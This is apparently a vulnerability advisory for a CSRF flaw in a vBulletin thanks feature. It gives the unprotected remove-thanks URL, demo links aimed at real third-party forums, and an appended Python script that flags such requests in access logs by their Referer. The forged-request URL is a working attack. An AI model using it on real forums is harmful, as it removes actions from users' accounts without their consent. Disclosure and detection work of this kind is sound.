
Vbulletin forums delete thanks CSRF All versions

Posted on 30 November -0001

########################################################
# Exploit Title: Vbulletin forums delete thanks CSRF (All versions)
# Date : 2016/08/22
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: https://www.vbulletin.com/
# Tested on: [Win 7/Firefox]
# Version : All versions
# Date : 27/08/2016
########################################################
#
# Location : http://localhost/forums/post_thanks.php?do=post_thanks_remove_user&p=[POST_ID]
#
########################################################
# Demo 1 :
#
# for this: http://ashiyane.org/forums/showthread.php?13217-Target-Trainings&p=985835&viewfull=1#post985835
# http://ashiyXane.org/forums/post_thanks.php?do=post_thanks_remove_user&p=985835
#
# for this: http://forums.irsXecteam.org/showthread.php?t=4686&p=5307&viewfull=1#post5307
# http://forums.irsXecteam.org/post_thanks.php?do=post_thanks_remove_user&p=5307
########################################################
# Description :
#
# When a thanks is added, a parameter called securitytoken is sent, but in thanks_remove the token parameter is not sent.
# This missing token is what causes the CSRF bug.
########################################################
# discovered by : MALWaRE43
########################################################
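A detection sketch for the issue described above, added here as an example and not part of the original advisory: since the remove request carries no securitytoken, the server cannot tell a forged request from a genuine one, so the access log's Referer field is the remaining signal. The Combined Log Format, the function name, the host names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: host ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"'
)

def flag_tokenless_thanks_removal(lines, forum_host):
    """Return (ip, post_id, reason) for remove-thanks requests that did not originate on the forum."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        url = urlsplit(m["target"])
        query = parse_qs(url.query)
        # Only the endpoint and action named in the advisory are of interest.
        if not url.path.endswith("/post_thanks.php"):
            continue
        if query.get("do") != ["post_thanks_remove_user"]:
            continue
        post_id = query.get("p", ["?"])[0]
        referer_host = urlsplit(m["referer"]).hostname  # None for "-" or an empty field
        if referer_host is None:
            findings.append((m["ip"], post_id, "no referer"))
        elif referer_host != forum_host:
            findings.append((m["ip"], post_id, "cross-site referer: " + referer_host))
    return findings

# Constructed sample log lines (documentation IP range, hypothetical host names).
SAMPLE = [
    '198.51.100.7 - - [27/Aug/2016:10:01:12 +0000] "GET /forums/post_thanks.php?do=post_thanks_remove_user&p=1001 HTTP/1.1" 200 512 "http://forum.example/forums/showthread.php?t=12&p=1001" "Mozilla/5.0"',
    '198.51.100.8 - - [27/Aug/2016:10:02:40 +0000] "GET /forums/post_thanks.php?do=post_thanks_remove_user&p=1002 HTTP/1.1" 200 512 "http://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Aug/2016:10:03:05 +0000] "GET /forums/post_thanks.php?do=post_thanks_remove_user&p=1003 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [27/Aug/2016:10:04:11 +0000] "GET /forums/showthread.php?t=12 HTTP/1.1" 200 9000 "http://other.example/page.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in flag_tokenless_thanks_removal(SAMPLE, "forum.example"):
        print(finding)
```

A missing Referer also occurs with privacy settings and direct navigation, so treat those hits as lower confidence than a cross-site Referer; the underlying fix is to require the securitytoken on the remove action as on the add action.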

 
